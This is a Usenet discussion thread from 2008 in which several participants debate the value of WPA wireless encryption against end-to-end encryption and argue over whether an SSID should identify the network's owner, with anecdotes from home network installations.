While I was working my client gave me a rundown on the Geek Squad, how
they had come out to fix the first wireless, couldn't get it working,
had to come back out to swap the wireless router for a different brand,
got that working albeit poorly, told my client it was poor because the
laptop was old, and left.
I probed a bit and learned the first wireless router had been brand L,
that the Geek Squad had swapped it for brand N when they couldn't make
it work, and that the laptop had then started working so they didn't
even touch it. Thus the laptop was still configured for brand L, and
what was actually happening was that it was connecting to a neighbor's
open wireless, not the new brand N wireless router, because the Geek
Squad were using factory defaults and no security. In 1-1/2 years of
paying for broadband my client had never actually used it, or the
expensive wireless router for that matter.
That wouldn't have happened, of course, if the Geek Squad had configured
a unique SSID in the first place, any sort of wireless security, or
otherwise had any real clue about wireless networking. (Likewise the
neighbor.) But I guess I shouldn't complain -- puts food on my table.
:)
* True story of network identification problem:
Before installing a wireless network for another client I did a site
survey (my normal practice), and found a strong signal on channel 1 and
another strong signal on channel 9 (go figure), leaving me with no clear
channel to use. The "easy" solution, of course, would be to persuade
the neighbor on channel 9 to switch to either channel 6 or channel 11.
Actually not so easy since the default SSID gave no clue as to who was
running that wireless network. Worse, my client was in a multi-unit
complex that left us with quite a few possibilities, which meant
knocking on a lot of doors, which had to wait until evening. It would
have been much faster and easier if the SSID identified the network
operator.
>John Navas wrote:
>
>> I respectfully disagree. Snooping of wireless traffic is orders of
>> magnitude more likely than snooping of wired traffic, and the really
>> serious threats aren't hard things like snooping of wired Internet
>> traffic -- they are relatively easy things like website compromise,
>> cross-site scripting attacks, and the like.
>
>Ummmm.... and WPA on the local wireless link protects against these?
Straw man argument: I didn't say or even suggest that.
>How? I think you're drifting off the point.
I was rebutting *your* claims.
>>> Can undetected intrusion occur? Of course, at least in theory. Is
>>> it likely? No.
>>
>> It's actually likely. The vast majority of intrusions go undetected,
>> even by folks with serious expertise. Your assumption is unwarranted,
>> and probably giving you a false sense of security.
>
>Who's making the unwarranted assumption here?
I'm making no assumption there.
>You know nothing about
>my systems or about what I know or can detect about them.
You have no way of knowing what you cannot detect or have not detected.
>The thing
>about undetected intrusion, of course, is that by definition, you never
>know if one has happened. However, if you know your systems well, and
>you know how to protect them, you can be pretty sure of raising the bar
>of the skill level that would be required for an undetected intrusion.
>You raise that bar high enough, and the question becomes whether or not
>it's worth the effort for the would-be intruder.
Again, your assumption is unwarranted, and probably giving you a false
sense of security. You have no way of knowing how high you've raised
the bar relative to potential attackers, or even if you've raised the
bar at all. All you can do is be as thorough as you can, *hope* it's
enough, and keep checking that hope in different ways.
>... Have I ever had a system compromised?
>Once, many years ago, via a then-recently discovered vulnerability in
>FTP server software on a system I was managing. Undetected? Only
>briefly ...
Again, your assumption is unwarranted, and probably giving you a false
sense of security. You have no way of knowing if you were compromised
or not. All you can say is that you don't know you were compromised.
>> It's hard if not impossible to encrypt *all* traffic end-to-end.
>
>Not *all* traffic contains sensitive data. Do I really care if you can
>sniff my Google searches and their results? Protect what's worth
>protecting.
Putting aside the fact that you've just backed away from your sweeping
claim, Google searches *can* be worth protecting. Should (say) a
prospective employer or insurer get wind of the fact that you're
repeatedly searching for cancer treatments, there might well be negative
consequences. Again, your assumption is unwarranted, and probably
giving you a false sense of security.
>Does WPA on a single network link do all that much to protect your
>username and password if you use POP or IMAP to read mail? I suppose
>it does if your only concern is protecting your credentials from the
>neighborhood teens. I prefer to avoid unencrypted protocols like POP
>or IMAP. If you use "secure POP" (POP/TLS) or "secure IMAP", it
>wouldn't matter if WPA wasn't available.
Another straw man argument: What WPA protects is *all* wireless
traffic, not just *some* wireless traffic.
>> But then even with end-to-end encryption you are still vulnerable to
>> compromise of and at the other end, which is a far more likely risk.
>
>It isn't "end-to-end" if it isn't "application-to-application".
You missed the point. Read what I wrote more carefully.
>WPA, as
>you know, won't protect your data at the other end. If the risk is far
>more likely, what protection does WPA offer?
None for that risk. What WPA does (as I'm sure you know) is protect
against the much higher risk of wireless snooping.
>... Businesses "believe" their data
>is "secure" because they've deployed a "firewall". How is that
>different than individuals believe their personal computers are "secure"
>because they've enabled WPA on their wireless access points?
They hopefully just believe their *wireless* is secure, which is true.
>> One of a great many cases in point:
>>
>> "This week also saw the personal information of almost 1,000 bank
>> customers lost by an employee of Bank of Ireland, after the data
>> was copied onto an unencrypted USB memory stick."
>
>I bet they had HTTPS for authenticated access to their web servers, and
>WPA-protected wireless local networks, though. They took the steps
>recommended to them by computer security "experts", yet still failed to
>protect their sensitive data. Thank you for helping make my point. :-)
Doesn't prove your point, but you are of course free to think and claim
whatever you want.
>> Sure, but I think you're worrying about the wrong problem.
>
>No, I'm worrying about understanding what it is I'm protecting, where,
>from what or whom, and why. ...
I think we'll just have to agree to disagree.
>> ... I need real evidence that snooping of traffic over the wired
>> Internet is a *significant* (not just theoretical) risk, especially as
>> compared to other risks.
>
>Wait a minute ... The points that you disagree with above, and for
>which I explained a simple means by which you can observe them in action
>("evidence") are the following:
Nope. Still waiting for your evidence.
>Now you want evidence that *wired* connections are vulnerable to
>snooping.
Assuming you're not deliberately resorting to straw man arguments, read
what I wrote more carefully.
Like Jeff I'm getting tired of this increasingly pointless debate, so
I'm going to give you the last word and be done with it.
Come now. The man, allegedly a security expert, allegedly writes an
article dissing wireless security, and ends up saying he doesn't see the
point in securing his network, given what he's said above. What
conclusion would the innocent draw from that?
> Sylvain Robitaille wrote
>>Now you want evidence that *wired* connections are vulnerable to
>>snooping.
> Still waiting for your evidence.
Are you really that sanguine concerning well-documented and likely
but undocumented domestic surveillance?
Michael
(snip story which boils down to 'uniquely identify your network so you
/know/ you're connecting to it'.)
> That wouldn't have happened, of course, if the Geek Squad had configured
> a unique SSID in the first place, any sort of wireless security, or
> otherwise had any real clue about wireless networking. (Likewise the
> neighbor.)
Absolutely agree.
> Before installing a wireless network for another client I did a site
> survey (my normal practice), and found a strong signal on channel 1 and
> another strong signal on channel 9 (go figure), leaving me with no clear
> channel to use. The "easy" solution, of course, would be to persuade
> the neighbor on channel 9 to switch to either channel 6 or channel 11.
> Actually not so easy since the default SSID gave no clue as to who was
> running that wireless network. Worse, my client was in a multi-unit
> complex that left us with quite a few possibilities, which meant
> knocking on a lot of doors, which had to wait until evening. It would
> have been much faster and easier if the SSID identified the network
> operator.
What wireless needs is a way to say "who the heck are you?" and for
end-users to be able to configure a response. Oh, wait, snmp... :-)
Only a very small fraction of Internet traffic is screened by the
government, and while I strongly object to the practice, I have nothing
directly to fear from it.
>On Tue, 02 Dec 2008 17:46:55 -0600, msg <msg@_cybertheque.org_> wrote in
><l6-dnVFvGrBHVajU...@posted.cpinternet>:
>
>>John Navas wrote:
>>
>>> Sylvain Robitaille wrote
>>
>>>>Now you want evidence that *wired* connections are vulnerable to
>>>>snooping.
>>
>>> Still waiting for your evidence.
>>
>>Are you really that sanguine concerning well-documented and likely
>>but undocumented domestic surveillance?
>
>Only a very small fraction of Internet traffic is screened by the
>government, and while I strongly object to the practice, I have nothing
>directly to fear from it.
p.s. IMHO there's a higher risk to me from poorly screened folks
working for Internet transit providers, but that risk is still too small
for me to worry much about.
>John Navas wrote:
>> Before installing a wireless network for another client I did a site
>> survey (my normal practice), and found a strong signal on channel 1 and
>> another strong signal on channel 9 (go figure), leaving me with no clear
>> channel to use. The "easy" solution, of course, would be to persuade
>> the neighbor on channel 9 to switch to either channel 6 or channel 11.
>> Actually not so easy since the default SSID gave no clue as to who was
>> running that wireless network. Worse, my client was in a multi-unit
>> complex that left us with quite a few possibilities, which meant
>> knocking on a lot of doors, which had to wait until evening. It would
>> have been much faster and easier if the SSID identified the network
>> operator.
>
>What wireless needs is a way to say "who the heck are you?" and for
>end-users to be able to configure a response. Oh, wait, snmp... :-)
Oh, wait, SNMP won't work when you can't connect to the network.
Or when the user isn't running suitable software and paying attention.
("What a router log?")
My suggestion is much simpler and more practical.
>>> I respectfully disagree. Snooping of wireless traffic is orders of
>>> magnitude more likely than snooping of wired traffic, and the really
>>> serious threats aren't hard things like snooping of wired Internet
>>> traffic -- they are relatively easy things like website compromise,
>>> cross-site scripting attacks, and the like.
>>
>> Ummmm.... and WPA on the local wireless link protects against these?
>
> Straw man argument: I didn't say or even suggest that.
The discussion at hand is about Bruce Schneier's article regarding his
unsecured wireless network, with most participants agreeing that such a
configuration is generally unadvisable. Perhaps you missed that part.
We seem to be disagreeing on the details of *how* the secured network is
beneficial, leading to the discussion above where you stray further from
the main point of discussion. Your response to an attempt to maintain the
focus of the discussion, apparently is to declare "straw-man", presumably
so you can continue adding more tangential points to the discussion. Ok.
>>How? I think you're drifting off the point.
>
> I was rebutting *your* claims.
My "claims" were that a WPA secured wireless network does not protect
(potentially sensitive) data in transit beyond the wireless link,
therefore that data is better protected by other means (such as end-to-end
encryption of the data). Which part of the above is a rebuttal to
that claim?
> You have no way of knowing if you were compromised or not.
Oh no. That's definitely not true. I can tell you with certainty that
a compromise happened if I find one. If I *don't* find a compromise,
however, all I can tell you (with certainty) is that I've not found one.
> Putting aside the fact that you've just backed away from your sweeping
> claim, ...
I don't recall making a "sweeping claim". Care to remind me?
>> Does WPA on a single network link do all that much to protect your
>> username and password if you use POP or IMAP to read mail? ...
>
> Another straw man argument: What WPA protects is *all* wireless
> traffic, not just *some* wireless traffic.
Yes it encrypts all the traffic on that one link. *All* the traffic then
(usually) travels on wired networks to its destination. The question
stands.
> ... What WPA does ... is protect against the much higher risk of
> wireless snooping.
WPA protects the access to the wireless network. Those are the "P" and
the "A" in WPA. I'll leave it to you to sort out the "W". One can't
"snoop" a network that one cannot access, but that's only part of the
equation.
>> ... Businesses "believe" their data is "secure" because they've
>> deployed a "firewall". How is that different than individuals
>> believe their personal computers are "secure" because they've enabled
>> WPA on their wireless access points?
>
> They hopefully just believe their *wireless* is secure, which is true.
Yes, hopefully, but that's not what I've been reading in this thread ...
I've been reading about "protecting computers from attack" by securing
access to the wireless network. I've been reading how protecting
the wireless link with WPA is easier than end-to-end encrypting data
in transit, so that's the security that must be in place. I've been
reading that sensitive data won't be intercepted if it's encrypted over
a single wireless link (with no mention of protecting that data beyond
the wireless link).
> I think we'll just have to agree to disagree.
Yes, on that we can agree.
>> Wait a minute ... The points that you disagree with above, and for
>> which I explained a simple means by which you can observe them in
>> action ("evidence") are the following:
>
> Nope. Still waiting for your evidence.
Well, then your disagreement was placed within the wrong context, and
the evidence you seek isn't clear.
> Like Jeff I'm getting tired of this increasingly pointless debate, so
> I'm going to give you the last word and be done with it.
I bet you won't, but I've made my point.
>> What wireless needs is a way to say "who the heck are you?" and for
>> end-users to be able to configure a response. Oh, wait, snmp... :-)
>
> Oh, wait, SNMP won't work when you can't connect to the network.
Indeed. I didn't say it was a fully formed solution, I was merely
pointing out that technologies exist to do this properly.
> Or when the user isn't running suitable software and paying attention.
> ("What a router log?")
Indeed - however if router makers were clueful, their "setup" CD could
solve this problem by asking for the relevant info.
>
> My suggestion is much simpler and more practical.
Sure - its a hack though. A proper solution shouldn't rely on misusing
an identifier field that isn't really long enough and which is freeform
text. Professionally I encounter this all the time 'there's nowhere to
put the UK post-code and the US Zip field is sanity checked so lets use
the "alternate email" field instead'. Terrific - until someone needs two
email addys... :-)
>John Navas wrote:
>> On Tue, 02 Dec 2008 23:18:35 +0000, Mark McIntyre
>
>>> What wireless needs is a way to say "who the heck are you?" and for
>>> end-users to be able to configure a response. Oh, wait, snmp... :-)
>>
>> Oh, wait, SNMP won't work when you can't connect to the network.
>
>Indeed. I didn't say it was a fully formed solution, I was merely
>pointing out that technologies exist to do this properly.
Except they don't. What's needed is something that can work *without* a
working connection. Like identification in the SSID. Fully formed.
Works well. Makes sense. Just too low tech for you? ;)
>> Or when the user isn't running suitable software and paying attention.
>> ("What a router log?")
>
>Indeed - however if router makers were clueful, their "setup" CD could
>solve this problem by asking for the relevant info.
Some wireless routers do at least now setup reasonable security, but I
doubt that any manufacturers will see sufficient payback in your
suggestion -- after all, the security issue only got addressed when the
problem got to be overwhelming.
>> My suggestion is much simpler and more practical.
>
>Sure - its a hack though.
Like many good solutions. :)
But not really -- SSID is actually an "ID" string.
>A proper solution shouldn't rely on misusing
>an identifier field
There's no misuse.
SSID is actually an "ID" string.
>that isn't really long enough
64 characters gets the job done for me.
What would you have to say that needs more than that?
>and which is freeform
>text.
[shrug]
>Professionally I encounter this all the time 'there's nowhere to
>put the UK post-code and the US Zip field is sanity checked so lets use
>the "alternate email" field instead'. Terrific - until someone needs two
>email addys... :-)
Installed a wireless network last week with the SSID containing name,
street address and phone number. Seems sufficient to me, but as always,
YMMV.
You just can't resist, can you. I've already agreed that SNMP isn't a
full solution, how about just stopping being so superior?
> What's needed is something that can work *without* a
> working connection. Like identification in the SSID. Fully formed.
> Works well. Makes sense. Just too low tech for you? ;)
You just can't resist being offensive can you?
> Installed a wireless network last week with the SSID containing name,
> street address and phone number. Seems sufficient to me, but as always,
> YMMV.
We've been over this ground. I'm not interested.
>John Navas wrote:
>> On Wed, 03 Dec 2008 23:00:40 +0000, Mark McIntyre
>> <markmc...@TROUSERSspamcop.net> wrote in
>> <scEZk.151182$c47.1...@en-nntp-06.am2.easynews.com>:
>>
>>> John Navas wrote:
>>>> On Tue, 02 Dec 2008 23:18:35 +0000, Mark McIntyre
>>>>> What wireless needs is a way to say "who the heck are you?" and for
>>>>> end-users to be able to configure a response. Oh, wait, snmp... :-)
>>>> Oh, wait, SNMP won't work when you can't connect to the network.
>>> Indeed. I didn't say it was a fully formed solution, I was merely
>>> pointing out that technologies exist to do this properly.
>>
>> Except they don't.
>
>You just can't resist, can you.
When you blow smoke I can't.
>I've already agreed that SNMP isn't a
>full solution, how about just stopping being so superior?
It's not any sort of solution, since it presupposes a connection that's
the whole point of the issue.
>> What's needed is something that can work *without* a
>> working connection. Like identification in the SSID. Fully formed.
>> Works well. Makes sense. Just too low tech for you? ;)
>
>You just can't resist being offensive can you?
Just a funny dig, but you apparently have a very thin skin.
In other words, you can dish it out, but you can't take it.
>> Installed a wireless network last week with the SSID containing name,
>> street address and phone number. Seems sufficient to me, but as always,
>> YMMV.
>
>We've been over this ground. I'm not interested.
Why am I not surprised.
--
Best regards,
John Navas <http:/navasgroup.com>
"A little learning is a dangerous thing." [Alexander Pope]
"It is better to sit in silence and appear ignorant,
than to open your mouth and remove all doubt." [Mark Twain]
"Being ignorant is not so much a shame, as being unwilling to learn."
[Benjamin Franklin]